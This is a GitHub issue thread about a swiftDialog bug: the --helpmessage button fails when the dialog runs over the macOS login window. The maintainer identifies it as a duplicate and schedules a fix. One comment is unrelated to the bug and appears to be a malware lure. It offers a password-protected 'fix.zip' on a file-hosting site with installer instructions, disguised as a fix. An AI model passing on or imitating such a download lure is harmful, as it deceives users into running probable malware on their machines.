### ISSUE TITLE
--helpmessage doesn't work on login window

### ISSUE THREAD

**Issue by wakco** [swiftDialog/swiftDialog#428]
When trying to use the `--helpmessage` feature with `--loginwindow` on the login window, the button appears, but when clicking the main dialog simply goes dark, and the help message does not appear. It however works correctly when testing (while someone is logged in), it is only while the dialog is running over the login window (with no one logged in) that the help button mis-behaves.

This was the behaviour on macOS 14.6.1 Sonoma with swiftDialog 2.5.1

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bartreardon** [comment]
cool - I think the same as #404 but that's fine. I'll slot it in for 2.5.2 which I'm working on at the moment as a minor bug fix release.

**Comment by wakco** [comment]
Ewps, I did look for dup's, but clearly not enough, thanks.

**Comment by bartreardon** [comment]
all good 🙂
